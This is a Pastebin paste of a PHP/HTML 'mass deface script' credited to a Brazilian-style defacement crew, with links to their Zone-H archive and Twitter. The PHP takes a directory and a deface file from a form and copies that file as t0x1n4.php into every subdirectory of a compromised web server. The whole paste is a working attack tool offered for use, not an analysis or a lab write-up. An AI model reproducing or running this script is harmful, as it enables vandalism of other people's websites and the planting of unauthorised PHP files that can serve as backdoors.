Advertisement
t0x1n4

T0x1n4 Mass Deface Script

Jul 7th, 2014
744
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.77 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="pt-BR">
  3. <head>
  4. <title>T0x1n4 Mass Deface Script [Pr1v8]</title>
  5. <link rel="icon" type="image/png" href="http://i.imgur.com/GSU0eaq.png"/>
  6. <link href='http://fonts.googleapis.com/css?family=Electrolize' rel='stylesheet' type='text/css'>
  7. <title>Hacked by T0x1n4 Cyb3r G4ng</title>
  8. <style>
  9. body {
  10. font-family: 'Electrolize', sans-serif;
  11. font-size: 16px;
  12. background-image:url('http://i.imgur.com/21mAb4R.gif');
  13. font-color: #000;
  14. </style>
  15. </head>
  16. <body>
  17. <center><FONT COLOR="#FF0000"><div><img src="http://i.imgur.com/GSU0eaq.png" width="45px"></img><b>T0x1n4 Mass Deface Script [pr1v8]</b></font><img src="http://i.imgur.com/GSU0eaq.png" width="45px"></img>
  18. <?php
  19. /*
  20. #############################################
  21. # Script: T0x1n4 Mass Deface Script [pr1v8] #
  22. # Author: V3nen0                            #
  23. # Email: t0x1n4@safe-mail.net               #
  24. #############################################
  25. */
  26. echo "<center><textarea rows='30' cols='100'>";
  27. $defaceurl = $_POST['massdefaceurl'];
  28. $dir = $_POST['massdefacedir'];
  29. echo $dir."\n";
  30.  
  31. if (is_dir($dir)) {
  32.     if ($dh = opendir($dir)) {
  33.         while (($file = readdir($dh)) !== false) {
  34.                         if(filetype($dir.$file)=="dir"){
  35.                                 $newfile=$dir.$file."/t0x1n4.php";
  36.                                 echo $newfile."\n";
  37.                                 if (!copy($defaceurl, $newfile)) {
  38.                                         echo "failed to copy $file...\n";
  39.                                 }
  40.                         }
  41.         }
  42.         closedir($dh);
  43.     }
  44. }
  45. echo "</textarea></center>";
  46. ?>
  47. <FONT COLOR="#FFF">
  48. <form action='<?php basename($_SERVER['PHP_SELF']); ?>' method='post'>
  49. [+] Diret&oacute;rio principal: <input type='text' style='width: 256px' value='<?php  echo getcwd() . "/"; ?>' name='massdefacedir'>
  50. [+] Index: <input type='text' style='width: 256px' name='massdefaceurl'>
  51. <input type='submit' style='width: 68px' name='execmassdeface' value='Come&ccedil;ar'></form></td>
  52. <br><FONT COLOR="#FF0000">Twitter:</font> <A STYLE="color:white; text-decoration:none" href="http://www.twitter.com/t0x1n4">http://www.twitter.com/t0x1n4</A> <img src="http://upload.wikimedia.org/wikipedia/commons/thumb/3/34/Red_star.svg/807px-Red_star.svg.png" width="15px"></img> <FONT COLOR="#FF0000">Zone-H:</font> <A STYLE="color:white; text-decoration:none" href="http://zone-h.org/archive/notifier=t0x1n4">http://zone-h.org/archive/notifier=t0x1n4 <img src="http://upload.wikimedia.org/wikipedia/commons/thumb/3/34/Red_star.svg/807px-Red_star.svg.png" width="15px"></img> <FONT COLOR="#FF0000">Pastebin:</font> <A STYLE="color:white; text-decoration:none" href="http://pastebin.com/u/t0x1n4">http://pastebin.com/u/t0x1n4</A>
  53. </center>
  54. </div>
  55. </FONT>
  56. </body>
  57. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement